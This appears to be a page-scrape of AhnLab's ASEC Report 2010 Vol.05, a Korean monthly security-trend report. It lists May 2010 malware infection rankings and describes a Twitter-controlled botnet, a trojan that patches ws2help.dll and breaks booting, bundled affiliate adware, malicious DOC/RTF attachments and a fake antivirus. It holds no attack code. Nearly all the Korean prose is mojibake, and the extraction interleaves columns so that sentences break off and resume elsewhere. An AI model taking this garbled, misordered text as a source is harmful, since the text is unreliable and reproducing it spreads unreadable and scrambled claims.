12

01 - AhnLab, Inc

  • Upload
    others

  • View
    4

  • Download
    0

Embed Size (px)

Citation preview

Page 1: 01 - AhnLab, Inc
Page 2: 01 - AhnLab, Inc
Page 3: 01 - AhnLab, Inc

์„ธ์ƒ์—์„œ ๊ฐ€์žฅ ์•ˆ์ „ํ•œ ์ด๋ฆ„ ์•ˆ์ฒ ์ˆ˜์—ฐ๊ตฌ์†Œ 01

โ… . ์ด๋‹ฌ์˜ ๋ณด์•ˆ ๋™ํ–ฅ

1. ์•…์„ฑ์ฝ”๋“œ ๋™ํ–ฅ

์•…์„ฑ์ฝ”๋“œ ํ†ต๊ณ„

2010๋…„ 5์›” ์•…์„ฑ์ฝ”๋“œ ํ†ต๊ณ„ํ˜„ํ™ฉ์€ ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

[ํ‘œ 1-2] ์•…์„ฑ์ฝ”๋“œ ๋Œ€ํ‘œ์ง„๋‹จ๋ช… ๊ฐ์—ผ๋ณด๊ณ  Top 20

2010๋…„ 5์›”์˜ ๊ฐ์—ผ๋ณด๊ณ  ๊ฑด์ˆ˜๋Š” Win-Trojan/Downloader๊ฐ€ ์ด 639,702

๊ฑด์œผ๋กœ Top20์ค‘ 11.3%์˜ ๋น„์œจ๋กœ 1์œ„๋ฅผ ์ฐจ์ง€ํ•˜๊ณ  ์žˆ์œผ๋ฉฐ, Win-Trojan/

Agent์ด 638,457๊ฑด์œผ๋กœ 2์œ„, Win-Trojan/Onlinegamehack์ด 476,563

๊ฑด์œผ๋กœ 3์œ„๋ฅผ ์ฐจ์ง€ ํ•˜์˜€๋‹ค.

์•„๋ž˜ ์ฐจํŠธ๋Š” ๊ณ ๊ฐ์œผ๋กœ๋ถ€ํ„ฐ ๊ฐ์—ผ์ด ๋ณด๊ณ ๋œ ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๋น„์œจ์ด๋‹ค.

[๊ทธ๋ฆผ 1-1] ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๊ฐ์—ผ๋ณด๊ณ  ๋น„์œจ

2010๋…„ 5์›”์˜ ์•…์„ฑ์ฝ”๋“œ ๊ฐ์—ผ ๋ณด๊ณ ๋Š” JS/Agent์ด 1์œ„๋ฅผ ์ฐจ์ง€ํ•˜๊ณ  ์žˆ์œผ

๋ฉฐ, TextImage/Autorun๊ณผ Win32/Induc๊ฐ€ ๊ฐ๊ฐ 2์œ„์™€ 3์œ„๋ฅผ ์ฐจ์ง€ ํ•˜์˜€

๋‹ค. ์‹ ๊ทœ๋กœ Top20์— ์ง„์ž…ํ•œ ์•…์„ฑ์ฝ”๋“œ๋Š” ์ด 6๊ฑด์ด๋‹ค.

[ํ‘œ 1-1] ์•…์„ฑ์ฝ”๋“œ ๊ฐ์—ผ๋ณด๊ณ  Top 20

์•„๋ž˜ ํ‘œ๋Š” ์•…์„ฑ์ฝ”๋“œ์˜ ์ฃผ์š” ๋™ํ–ฅ์„ ํŒŒ์•…ํ•˜๊ธฐ ์œ„ํ•˜์—ฌ, ์•…์„ฑ์ฝ”๋“œ ๋ณ„ ๋ณ€์ข…์„

์ข…ํ•ฉํ•œ ์•…์„ฑ์ฝ”๋“œ ๋Œ€ํ‘œ์ง„๋‹จ๋ช… ๊ฐ์—ผ๋ณด๊ณ  Top20์ด๋‹ค.

AhnLab Policy Center 4.0

Page 4: 01 - AhnLab, Inc

02 ASEC Report _ 2010. Vol.05

์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๊ฐ์—ผ๋ณด๊ณ  ๋น„์œจ์„ ์ „์›”๊ณผ ๋น„๊ตํ•˜๋ฉด, ์Šคํฌ๋ฆฝํŠธ, ๋“œ๋กญํผ

(DROPPER), ๋‹ค์šด๋กœ๋”(DOWNLOADER)๊ฐ€ ์ „์›”์— ๋น„ํ•ด ์ฆ๊ฐ€์„ธ๋ฅผ ๋ณด์ด

๊ณ  ์žˆ๋Š” ๋ฐ˜๋ฉด ํŠธ๋กœ์ž”, ์›œ, ๋ฐ”์ด๋Ÿฌ์Šค(VIRUS), ์• ๋“œ์›จ์–ด(ADWARE), ์• ํ”„

์ผ€์–ด(APPCARE), ์ŠคํŒŒ์ด์›จ์–ด(SPY WARE)๋Š” ์ „์›”์— ๋น„ํ•ด ๊ฐ์†Œํ•œ ๊ฒƒ์„

๋ณผ ์ˆ˜ ์žˆ๋‹ค.

[๊ทธ๋ฆผ 1-2] ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๊ฐ์—ผ๋ณด๊ณ  ์ „์›” ๋น„๊ต

[๊ทธ๋ฆผ 1-3] ์•…์„ฑ์ฝ”๋“œ ์›”๋ณ„ ๊ฐ์—ผ๋ณด๊ณ  ๊ฑด์ˆ˜

5์›”์˜ ์•…์„ฑ์ฝ”๋“œ ์›”๋ณ„ ๊ฐ์—ผ๋ณด๊ณ  ๊ฑด์ˆ˜๋Š” 11,537,351๊ฑด์œผ๋กœ 4์›”์˜ ์•…์„ฑ

์ฝ”๋“œ ์›”๋ณ„ ๊ฐ์—ผ ๋ณด๊ณ ๊ฑด์ˆ˜ 10,300,965๊ฑด์— ๋น„ํ•ด 1,236,386๊ฑด์ด ์ฆ๊ฐ€ํ•˜

์˜€๋‹ค.

[ํ‘œ 1-3] ์‹ ์ข… ์•…์„ฑ์ฝ”๋“œ ๊ฐ์—ผ๋ณด๊ณ  Top 20

5์›”์˜ ์‹ ์ข… ์•…์„ฑ์ฝ”๋“œ ๊ฐ์—ผ ๋ณด๊ณ ์˜ Top 20์€ Win-Trojan/Overtls.

575488๊ฐ€ 275,685๊ฑด์œผ๋กœ ์ „์ฒด 33.3%๋ฅผ ์ฐจ์ง€ํ•˜์—ฌ 1์œ„๋ฅผ ์ฐจ์ง€ํ•˜์˜€์œผ๋ฉฐ,

Win-Trojan/Agent. 240222๊ฐ€ 45,886๊ฑด 2์œ„๋ฅผ ์ฐจ์ง€ํ•˜์˜€๋‹ค.

์•…์„ฑ์ฝ”๋“œ ์ด์Šˆ

ํŠธ์œ„ํ„ฐ ๋ด‡๋„ท ์•…์„ฑ์ฝ”๋“œ

5์›”์—๋Š” ํŠธ์œ„ํ„ฐ์˜ ๋Œ€์ค‘ํ™”๋ฅผ ํ‹ˆํƒ€ ํŠธ์œ„ํ„ฐ๋ฅผ ์ด์šฉํ•˜์—ฌ ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์ œ์–ดํ•˜

๋Š” ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ์•Œ๋ ค์กŒ๋‹ค. ์ง€๊ธˆ๊นŒ์ง€ SNS ๊ด€๋ จ ์•…์„ฑ์ฝ”๋“œ๋Š” ์‚ฌ์šฉ์ž ๊ณ„์ •์ด

๋‚˜ ๋ฒ„๋”” ๊ณ„์ •์— ์ŠคํŒธ์„ฑ ๋ฉ”์‹œ์ง€๋ฅผ ๋‹ฌ๊ฑฐ๋‚˜ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ์—…๋กœ๋“œ ๋œ ์‚ฌ์ดํŠธ๋กœ

์œ ๋„ํ•˜๋Š”๊ฒŒ ์ผ๋ฐ˜์ ์ด์—ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ํ•ด๋‹น ์•…์„ฑ์ฝ”๋“œ๋Š” ๋จผ์ € ์‚ฌ์šฉ์ž ๊ณ„์ •์ด

2010๋…„ 5 ์›”์˜ ๊ฐ์—ผ๋ณด๊ณ  ๊ฑด์ˆ˜๋Š” ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„๋กœ ๊ฐ์—ผ๋ณด๊ณ ๊ฑด์ˆ˜ ๋น„์œจ

์€ ํŠธ๋กœ์ž”(TROJAN)๋ฅ˜๊ฐ€ 44.5%๋กœ ๊ฐ€์žฅ ๋งŽ์€ ๋น„์œจ์„ ์ฐจ์ง€ํ•˜๊ณ , ์Šคํฌ๋ฆฝ

ํŠธ(SCRIPT)๊ฐ€ 13%, ์›œ(WORM)๊ฐ€ 12.3%์˜ ๋น„์œจ์„ ๊ฐ๊ฐ ์ฐจ์ง€ํ•˜๊ณ  ์žˆ๋‹ค.

[๊ทธ๋ฆผ 1-4] ์‹ ์ข… ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๋ถ„ํฌ

5์›”์˜ ์‹ ์ข… ์•…์„ฑ์ฝ”๋“œ ์œ ํ˜•๋ณ„ ๋ถ„ํฌ๋Š” ํŠธ๋กœ์ž”์ด 73%๋กœ 1์œ„๋ฅผ ์ฐจ์ง€ํ•˜์˜€๋‹ค.

๊ทธ ๋’ค๋ฅผ ์ด์–ด ์• ๋“œ์›จ์–ด๊ฐ€ 10%, ๋“œ๋กญํผ๊ฐ€ 6%๋ฅผ ๊ฐ๊ฐ ์ฐจ์ง€ํ•˜์˜€๋‹ค.

์•„๋ž˜ ํ‘œ๋Š” 5์›”์— ์‹ ๊ทœ๋กœ ์ ‘์ˆ˜๋œ ์•…์„ฑ์ฝ”๋“œ ์ค‘ ๊ณ ๊ฐ์œผ๋กœ๋ถ€ํ„ฐ ๊ฐ์—ผ์ด ๋ณด๊ณ 

๋œ ์•…์„ฑ์ฝ”๋“œ Top20์ด๋‹ค.

AhnLab V3 Internet Security 8.0

Page 5: 01 - AhnLab, Inc

์„ธ์ƒ์—์„œ ๊ฐ€์žฅ ์•ˆ์ „ํ•œ ์ด๋ฆ„ ์•ˆ์ฒ ์ˆ˜์—ฐ๊ตฌ์†Œ 03

์‹œ์Šคํ…œ ํŒŒ์ผ์„ ํŒจ์น˜ ํ•˜๋Š” ์•…์„ฑ์ฝ”๋“œ์™€ BSOD

5์›”์—๋Š” ์œ ๋‚œํžˆ ์‹œ์Šคํ…œ ํŒŒ์ผ์„ ํŒจ์น˜ ํ•˜๋Š” ์•…์„ฑ์ฝ”๋“œ ์†Œ์‹์ด ์ž์ฃผ ๋“ค๋ ค ์™”

๋‹ค. ์‹œ์Šคํ…œ ํŒŒ์ผ์„ ํŒจ์น˜ ํ•˜๋Š” ์•…์„ฑ์ฝ”๋“œ๋Š” ์ž์‹ ์˜ ์‹คํ–‰์„ ์œ„ํ•ด์„œ ๋ ˆ์ง€์ŠคํŠธ

๋ฆฌ๋ฅผ ์ด์šฉํ•˜๋Š” ๊ฒƒ์ด ์•„๋‹ˆ๋ผ ํŒจ์น˜ ๋œ ์œˆ๋„์šฐ ์‹œ์Šคํ…œ ํŒŒ์ผ (์ฃผ๋กœ DLL ํ™•์žฅ

์ž์˜ ํŒŒ์ผ๋“ค)์˜ ํ”„๋กœ๊ทธ๋žจ ์‹œ์ž‘ ๋ถ€๋ถ„์˜ ์ฝ”๋“œ๋‚˜ ์ž„ํฌํŠธ(Import) ํ•จ์ˆ˜ ๋ถ€๋ถ„

์„ ์ˆ˜์ •ํ•˜์—ฌ ์ž์‹ ์„ ๋™์ž‘ ์‹œํ‚ค๋Š” ์•…์„ฑ์ฝ”๋“œ๋ฅผ ๋งํ•œ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฒฐ๊ณผ๋กœ ๋ถ€

ํŒ… ์‹œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๋ชจ๋‹ˆํ„ฐ๋ง์ด๋‚˜ ์‹œ์ž‘ ํ”„๋กœ๊ทธ๋žจ์„ ๊ด€๋ฆฌํ•˜๋Š” ํ”„๋กœ๊ทธ๋žจ๋“ค์€

์•…์„ฑ์ฝ”๋“œ์˜ ์‹คํ–‰์‹œ์ ์„ ์ฐพ์•„ ๋‚ด์ง€ ๋ชปํ•˜๊ฒŒ ๋œ๋‹ค. ์ด ๋•Œ๋ฌธ์— ์ตœ๊ทผ ๋“ค์–ด ์•…

์„ฑ์ฝ”๋“œ ์ œ์ž‘์— ๋งŽ์ด ์‚ฌ์šฉ ๋˜๊ณ  ์žˆ๋‹ค. ์ด๋ฒˆ์— ํƒ€์ผ“์ด ๋œ ํŒŒ์ผ์€ ws2help.

dll ํŒŒ์ผ์ด์—ˆ๋‹ค. ํŠนํžˆ, ์ด๋ฒˆ ์•…์„ฑ์ฝ”๋“œ๋Š” ํŒจ์น˜ ํ•œ ํŒŒ์ผ์„ ์˜ฌ๋ฐ”๋ฅธ ๊ณณ์— ๋ณต

์‚ฌํ•˜์ง€ ์•Š์•„, ์‹œ์Šคํ…œ์ด ์ •์ƒ์ ์œผ๋กœ ๋ถ€ํŒ… ๋˜์ง€ ์•Š๋Š” ์ƒํ™ฉ์ด ๋ฐœ์ƒํ•˜์˜€๋‹ค.

๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ฉ”์‹œ์ง€๊ฐ€ ์ถœ๋ ฅ๋˜๊ณ  ์œˆ๋„์šฐ๊ฐ€ ์ •์ƒ์ ์œผ๋กœ ๋ถ€ํŒ… ๋˜์ง€ ์•Š์•˜๋‹ค.

์ผ๋ฐ˜์ ์ธ ๋ด‡๋„ท์˜ ์ฐจ๋‹จ ๋ฐฉ๋ฒ•์€ ๋ด‡๋„ท์ด ์ด์šฉ ํ•˜๋Š” ์„œ๋ฒ„์— ๋Œ€ํ•œ ์ฐจ๋‹จ์„ ํ†ตํ•ด

์„œ ๊ทผ๋ณธ์ ์œผ๋กœ ๋ด‡๋„ท์ด ํ™œ์„ฑํ™” ๋  ์ˆ˜ ์—†๊ฒŒ ํ•œ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ํŠธ์œ„ํ„ฐ์™€ ๊ฐ™์€ ์ƒ

์šฉ ์„œ๋น„์Šค๋ฅผ ์ด์šฉํ•œ๋‹ค๋ฉด, ์ผ๋ฐ˜์ ์ธ ์ฐจ๋‹จ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์—†์–ด ๊ณต๊ฒฉ์ž๋Š”

์ž์œ ๋กญ๊ฒŒ ๋ช…๋ น์„ ๋‚ด๋ณด๋‚ผ ์ˆ˜ ์žˆ๊ฒŒ ๋˜๋ฏ€๋กœ ์ด๋Ÿฌํ•œ ์ƒ์šฉ ์„œ๋น„์Šค๋ฅผ ์•…์šฉํ•˜๋Š”

๋ด‡๋„ท ์‚ฌ๋ก€๊ฐ€ ์ฆ๊ฐ€ํ•  ๊ฒƒ์œผ๋กœ ์˜ˆ์ƒ ๋œ๋‹ค.

[๊ทธ๋ฆผ 1-5] ํŠธ์œ„ํ„ฐ ๋ด‡์˜ ์ƒ์„ฑ ๋ฐ ๋™์ž‘ ์˜ˆ

[๊ทธ๋ฆผ 1-6] Win-Trojan/Patcher.17945 ๊ฐ์—ผ ํ›„ ์œˆ๋„์šฐ๊ฐ€ ๋ถ€ํŒ… ๋˜์ง€ ์•Š๋Š” ๋ชจ์Šต

์ด๋Ÿฌํ•œ ๊ณผ์ •์„ ๋„์‹ํ™” ํ•˜๋ฉด [๊ทธ๋ฆผ 1-7]๊ณผ ๊ฐ™๋‹ค. ์ฆ‰ ์œ„์—์„œ ์–ธ๊ธ‰ ํ–ˆ๋“ฏ์ด

์œˆ๋„์šฐ ์‹œ์Šคํ…œ ํด๋”์— ํŒจ์น˜ ๋œ ํŒŒ์ผ์ด ์กด์žฌํ•ด์•ผ ํ•˜์ง€๋งŒ ์•…์„ฑ์ฝ”๋“œ๋Š” ์‹œ์Šค

ํ…œ ํด๋”๊ฐ€ ์•„๋‹Œ %windir%system\ ํด๋”์— ํŒจ์น˜ ๋œ ํŒŒ์ผ์„ ๋ณต์‚ฌํ•˜์˜€๋‹ค.

[๊ทธ๋ฆผ 1-7] Win-Trojan/Patcher.17945 ์‹คํ–‰๊ณผ์ •

๋‚˜ ์ด๋ฏธ ํ›”์ณ๋‚ธ ๊ณ„์ •์— ์•…์„ฑ์ฝ”๋“œ ์ œ์–ด๊ด€๋ จ ๋‚ด์šฉ์„ ํŠธ์œ— ํ•œ ํ›„ ์•…์„ฑ์ฝ”๋“œ๊ฐ€

์ด๋ฅผ ์ฝ์–ด ๋“ค์ธ ํ›„ ์•…์˜์ ์ธ ํ–‰๋™์„ ์ทจํ•œ๋‹ค.

์ œํœด ๋งˆ์ผ€ํŒ…๊ณผ ๊ฒฐํƒํ•œ ์• ๋“œ์›จ์–ด

์ธํ„ฐ๋„ท ํ‚ค์›Œ๋“œ ๊ฒ€์ƒ‰ ๋„์šฐ๋ฏธ ์„œ๋น„์Šค๋Š” ์›น ๋ธŒ๋ผ์šฐ์ € ์ฃผ์†Œ ํ‘œ์‹œ์ค„์— ๊ฒ€์ƒ‰ํ•˜

๊ณ ์ž ํ•˜๋Š” ํ‚ค์›Œ๋“œ๋งŒ ์ž…๋ ฅํ•˜๋ฉด ๊ด€๋ จ๋œ ๊ฒ€์ƒ‰ ๊ฒฐ๊ณผ๋ฅผ ๋ณด์—ฌ์ฃผ์–ด ์ธํ„ฐ๋„ท ์„œํ•‘

์— ๋„์›€์„ ์ค„ ์ˆ˜ ์žˆ๋‹ค. ํ•˜์ง€๋งŒ ์ตœ๊ทผ์—๋Š” ์ด๋“ค ์ธํ„ฐ๋„ท ํ‚ค์›Œ๋“œ ๊ฒ€์ƒ‰ ๋„์šฐ๋ฏธ

์„œ๋น„์Šค๋“ค์„ ๋ณด๋‹ค ๋งŽ์€ ์‚ฌ์šฉ์ž๋“ค์˜ PC์— ์„ค์น˜ํ•˜๊ธฐ ์œ„ํ•ด ๋ฌด๋ฃŒ ๊ฒŒ์ž„, ๋ฌด๋ฃŒ

์›น ํ•˜๋“œ ์„œ๋น„์Šค, UCC ์žฌ์ƒ๊ธฐ, ๊ธฐํƒ€ ์• ๋“œ์›จ์–ด์— ๋ฒˆ๋“ค ํ˜•ํƒœ๋กœ ์„ค์น˜๋˜๊ธฐ ์‹œ

์ž‘ํ–ˆ๋‹ค. ๋˜ํ•œ ๋†’์€ ์ˆ˜์ต์„ ์œ„ํ•ด ์ œํœด ๋งˆ์ผ€ํŒ… ์‚ฌ์ดํŠธ์™€ ์—ฐ๊ณ„ํ•ด ํŠน์ • ์‡ผํ•‘

๋ชฐ๋กœ ๋ฐฉ๋ฌธ์„ ์œ ๋„ํ•˜๋Š” ๋ถ€์ž‘์šฉ์ด ๋ฐœ์ƒํ•˜๊ณ  ์žˆ๋‹ค. ์ธํ„ฐ๋„ท ๊ฒ€์ƒ‰ ๋„์šฐ๋ฏธ ์„œ

๋น„์Šค๋ฅผ ํ†ตํ•ด ์‡ผํ•‘๋ชฐ์„ ๋ฐฉ๋ฌธํ•˜์—ฌ ์ƒํ’ˆ์„ ๊ตฌ๋งคํ•˜๋Š” ๊ฒฝ์šฐ ๊ฒฐ์ œ ๊ธˆ์•ก์˜ ์ผ

์ • ๋น„์œจ์„ ์ˆ˜์ˆ˜๋ฃŒ๋กœ ์ œํœด ๋งˆ์ผ€ํŒ… ์‚ฌ์ดํŠธ๋ฅผ ํ†ตํ•ด ์ง€๊ธ‰ ๋ฐ›๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค. ๋˜

ํ•œ ๋ณด๋‹ค ๋งŽ์€ ์‚ฌ์šฉ์ž๋“ค์˜ ์ปดํ“จํ„ฐ์— ์„ค์น˜ํ•˜๊ธฐ ์œ„ํ•ด ์•…์˜์ ์ธ ๋ฐฉ๋ฒ•๋“ค๊นŒ์ง€

์‚ฌ์šฉํ•˜๊ณ  ์žˆ์œผ๋ฉฐ ๋ณด์•ˆ ์—…์ฒด์˜ ์ง„๋‹จ์„ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด ํ”„๋กœ๊ทธ๋žจ ๋‚ด๋ถ€์˜ ํŠน

์ • ๋ฌธ์ž์—ด์„ ๋‹ค๋ฅธ ๋ฌธ์ž์™€ ์กฐํ•ฉํ•˜์—ฌ ์ผ๋ฐ˜์ ์œผ๋กœ๋Š” ์•Œ์•„๋ณด๊ธฐ ํž˜๋“ค๊ฒŒ ๋ณ€ํ˜•

ํ•ด ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๋‹ค.

์ด๊ฒƒ์€ ์•…์„ฑ์ฝ”๋“œ ์ œ์ž‘์ž์˜ ์˜๋„์ ์ธ ๊ฒƒ์ด๋ผ๊ธฐ ๋ณด๋‹ค๋Š” ์‹ค์ˆ˜๋กœ ์ถ”์ •๋˜๋ฉฐ

์ด๋ฅผ ๋ณต๊ตฌ ํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” ์›๋ณธ ํŒŒ์ผ์„ ์ฐพ์•„ ํŒŒ์ผ๋ช…์„ ๋ณ€๊ฒฝํ•ด์ฃผ๋Š” ๋“ฑ์˜ ์ถ”

๊ฐ€์ž‘์—…์ด ํ•„์š”ํ•˜์—ฌ ์‚ฌ์šฉ์ž๋“ค์ด ๋ถˆํŽธํ•จ์„ ํ˜ธ์†Œํ•œ ์‚ฌ๋ก€์˜€๋‹ค.

[๊ทธ๋ฆผ 1-8] ์œ ๋ช… ์ธํ„ฐ๋„ท ์‡ผํ•‘๋ชฐ ์ฃผ์†Œ๋ฅผ ๋ณ€ํ˜•์‹œ์ผœ ๋†“์€ ๋ถ€๋ถ„

Page 6: 01 - AhnLab, Inc

04 ASEC Report _ 2010. Vol.05

2. ์‹œํ๋ฆฌํ‹ฐ ๋™ํ–ฅ

์‹œํ๋ฆฌํ‹ฐ ํ†ต๊ณ„

5์›” ๋งˆ์ดํฌ๋กœ์†Œํ”„ํŠธ ๋ณด์•ˆ ์—…๋ฐ์ดํŠธ ํ˜„ํ™ฉ

๋งˆ์ดํฌ๋กœ์†Œํ”„ํŠธ์‚ฌ๋กœ๋ถ€ํ„ฐ ๋ฐœํ‘œ๋œ ์ด๋ฒˆ ๋‹ฌ ๋ณด์•ˆ ์—…๋ฐ์ดํŠธ๋Š” 2๊ฑด์ด๋‹ค.

์‹ค์ œ 5์›” ์‹ ์ข… ์•…์„ฑ์ฝ”๋“œ ๊ฐ์—ผ๋ณด๊ณ ๋ฅผ ์‚ดํŽด๋ณด๋ฉด Win-Trojan/Overtls, Win-

Trojan/Unovt๊ฐ€ ๊ฐ๊ฐ 1์œ„์™€ 4์œ„๋ฅผ ํ•˜๊ณ  ์žˆ์Œ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค. ์ฆ‰, ๊ทธ๋งŒํผ

๊ตญ๋‚ด ์‚ฌ์šฉ์ž๋“ค์˜ ํ”ผํ•ด๊ฐ€ ํฌ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. ์ด๋“ค ์ธํ„ฐ๋„ท ํ‚ค์›Œ๋“œ ๊ฒ€

์ƒ‰ ๋„์šฐ๋ฏธ ์„œ๋น„์Šค๊ฐ€ ์„ค์น˜๋˜์–ด ์žˆ์„ ๊ฒฝ์šฐ ์ธํ„ฐ๋„ท ๊ฒ€์ƒ‰ ์‹œ ๋‚ด๊ฐ€ ์›ํ•˜๋Š” ๊ฒฐ

๊ณผ๊ฐ€ ์•„๋‹Œ ํ•ด๋‹น ์• ๋“œ์›จ์–ด๊ฐ€ ๋ฐฉ๋ฌธ์„ ์œ ๋„ํ•˜๋Š” ๊ณณ์œผ๋กœ ๋ณ€๊ฒฝ๋œ ๊ฒ€์ƒ‰ ๊ฒฐ๊ณผ๋ฅผ

์–ป์„ ์ˆ˜ ์žˆ์œผ๋ฉฐ, ๋‚ด๊ฐ€ ์„ ํ˜ธํ•˜๋Š” ์ธํ„ฐ๋„ท ์‡ผํ•‘๋ชฐ์ด ์•„๋‹Œ ์• ๋“œ์›จ์–ด ์ œ์ž‘์ž์—

๊ฒŒ ๋ณด๋‹ค ๋†’์€ ์ˆ˜์ต์„ ์ค„ ์ˆ˜ ์žˆ๋Š” ์ธํ„ฐ๋„ท ์‡ผํ•‘๋ชฐ๋กœ ๋ฐฉ๋ฌธ์ด ์œ ๋„๋  ์ˆ˜ ์žˆ๋‹ค.

๋ฌธ์„œํŒŒ์ผ์— ํฌํ•จ๋œ ์•…์„ฑ์ฝ”๋“œ ์ฃผ์˜

5์›”์—๋Š” ๋ฉ”์ผ์„ ํ†ตํ•ด ์œ ํฌ๋˜๋Š” ์•…์„ฑ์ฝ”๋“œ ์ค‘ DOC ํ˜น์€ RTF ๋“ฑ์˜ ํ™•์žฅ

์ž์˜ ๋ฌธ์„œ๋ฅผ ์ด์šฉํ•œ ์•…์„ฑ์ฝ”๋“œ ์œ ํฌ ์‚ฌ๋ก€๊ฐ€ ํ™•์ธ๋˜์—ˆ๋‹ค. [๊ทธ๋ฆผ 1-9]์— ์žˆ

๋Š” ์ฒจ๋ถ€ํŒŒ์ผ์„ ์‹คํ–‰ํ•˜๋ฉด ๋ฌธ์„œ ๋‚ด๋ถ€์— ํŠน์ • ์•„์ด์ฝ˜์ด ๋‚˜ํƒ€๋‚˜๋ฉฐ ํด๋ฆญ์„ ์œ 

๋„ํ•˜๊ฒŒ ๋œ๋‹ค.

[๊ทธ๋ฆผ 1-9] ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ํฌํ•จ๋œ ๋ฌธ์„œ ์—ด๋žŒ ์‹œ ๋‚˜ํƒ€๋‚˜๋Š” ๊ฒฝ๊ณ ์ฐฝ

๋งŒ์ผ, ํด๋ฆญ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ๊ฒฝ๊ณ  ์ฐฝ์ด ๋‚˜ํƒ€๋‚˜๋ฉฐ [ํ™•์ธ] ๋ฒ„ํŠผ์„ ๋ˆ„๋ฅผ ๊ฒฝ์šฐ ๋ฌธ์„œ

๋‚ด๋ถ€์— ํฌํ•จ๋œ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ์‹คํ–‰์ด ๋œ๋‹ค. ์ตœ๊ทผ ์•…์„ฑ์ฝ”๋“œ ์œ ํฌ ๊ธฐ๋ฒ•์ด ์ ์ 

๋‹ค์–‘ํ•ด์ง€๋ฉฐ ๋ฐœ์ „๋˜๊ณ  ์žˆ์–ด ์ด๋Ÿฌํ•œ ๋ฐœ์‹ ์ธ์ด ๋ถˆ๋ถ„๋ช…ํ•œ ๋ฉ”์ผ์„ ํ†ตํ•ด ์ฒจ๋ถ€

๋˜๋Š” ๋ฌธ์„œ๋‚˜ ๊ธฐํƒ€ ์ฒจ๋ถ€ํŒŒ์ผ์€ ๋˜๋„๋ก์ด๋ฉด ์‹คํ–‰ํ•˜์ง€ ์•Š๋Š” ๊ฒƒ์„ ๊ถŒ์žฅํ•œ๋‹ค.

ํ—ˆ์œ„ ๋ฐฑ์‹  Digital Protection / Data Protection ์ฃผ์˜

5์›”์—๋Š” ์œ ๋‚œํžˆ Digital Protection, Data Protection ๋ผ๋Š” ์ด๋ฆ„์„ ๊ฐ€์ง„ ํ—ˆ

์œ„ ๋ฐฑ์‹ ์ด ๊ธฐ์Šน์„ ๋ถ€๋ ธ๋‹ค. ํ•ด๋‹น ํ—ˆ์œ„๋ฐฑ์‹ ์ด ์„ค์น˜๊ฐ€ ๋˜๋ฉด ์‹œ์Šคํ…œ ํŠธ๋ ˆ์ด

์ฐฝ์— ์ง€์†์ ์ธ ๊ฒฝ๊ณ ๋ฅผ ๋‚˜ํƒ€๋‚ด๋ฉฐ ์ธํ„ฐ๋„ท ์ต์Šคํ”Œ๋กœ๋Ÿฌ๋ฅผ ์ด์šฉํ•˜์—ฌ ์›น์‚ฌ์ด

ํŠธ ์ ‘์† ์‹œ ์‚ฌ์ดํŠธ ์ ‘์†์„ ์ฐจ๋‹จํ•˜๋ฉฐ ์•…์„ฑ์ฝ”๋“œ ๊ฐ์—ผ ๊ฒฝ๊ณ  ๋ฐ ๊ฒฐ์ œ ์ฐฝ์„ ๋ณด

์—ฌ์ฃผ๊ฒŒ ๋œ๋‹ค.

[๊ทธ๋ฆผ 1-8] ์œ ๋ช… ์ธํ„ฐ๋„ท ์‡ผํ•‘๋ชฐ ์ฃผ์†Œ๋ฅผ ๋ณ€ํ˜•์‹œ์ผœ ๋†“์€ ๋ถ€๋ถ„

์ด๋Ÿฌํ•œ ํ—ˆ์œ„ ๋ฐฑ์‹ ์ด ์„ค์น˜๋  ๊ฒฝ์šฐ ์™ธ๋ถ€๋กœ ์ŠคํŒธ๋ฉ”์ผ์„ ๋ฐœ์†กํ•˜์—ฌ ์‹œ์Šคํ…œ์ด

๋Š๋ ค์ง€๊ฑฐ๋‚˜ ๋„คํŠธ์›Œํฌ ํŠธ๋ž˜ํ”ฝ์ด ๋งŽ์ด ๋ฐœ์ƒํ•˜๋Š” ์ฆ์ƒ์„ ๋ณด์ด๊ณ  ์žˆ๋‹ค. ํ˜„์žฌ

V3 ์ œํ’ˆ์—์„œ ๋Œ€๋‹ค์ˆ˜ ์ง„๋‹จ ๋ฐ ์น˜๋ฃŒ๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‚˜ ์ง€์†์ ์ธ ๋ณ€์ข…์ด ์ถœํ˜„ํ•˜

๊ณ  ์žˆ์–ด ๊ฐ๋ณ„ํ•œ ์ฃผ์˜๊ฐ€ ํ•„์š”ํ•˜๋‹ค. V3๋Š” ๋ณ€์ข…์„ ๋ฐœ๊ฒฌ์‹œ ์ตœ์‹  ์—”์ง„์„ ์ œ์ž‘

ํ•˜์—ฌ ์ง„๋‹จ ๋ฐ ์น˜๋ฃŒํ•˜๊ณ  ์žˆ์œผ๋‹ˆ, ํ•ญ์ƒ ์ตœ์‹ ๋ฒ„์ „์˜ ์—”์ง„์„ ์„ค์น˜ํ•˜์—ฌ ๋ณ€์ข…์„

์‚ฌ์ „์— ์ฐจ๋‹จํ•˜๊ธฐ ๋ฐ”๋ž€๋‹ค.

